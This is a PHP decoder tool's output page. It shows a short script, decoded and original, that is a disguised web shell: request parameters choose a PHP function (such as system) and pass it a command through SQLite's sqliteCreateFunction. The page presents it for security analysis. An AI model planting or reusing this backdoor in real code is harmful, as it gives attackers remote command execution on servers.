Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $e = $_REQUEST['e']; $db = new PDO('sqlite:sqlite.db3'); $db->sqliteCreateF..

Decoded Output download

<?php 
  $e = $_REQUEST['e']; 
  $db = new PDO('sqlite:sqlite.db3'); 
  $db->sqliteCreateFunction('myfunc', $e, 1); 
  $sth = $db->prepare("SELECT myfunc(:exec)"); 
  $sth->execute(array(':exec' => $_REQUEST['pass'])); 
?>

Did this file decode correctly?

Original Code

<?php
  $e = $_REQUEST['e'];
  $db = new PDO('sqlite:sqlite.db3');
  $db->sqliteCreateFunction('myfunc', $e, 1);
  $sth = $db->prepare("SELECT myfunc(:exec)");
  $sth->execute(array(':exec' => $_REQUEST['pass']));
?>

Function Calls

None

Variables

$e None

Stats

MD5 38210f9140680946f015770f0d04759d
Eval Count 0
Decode Time 99 ms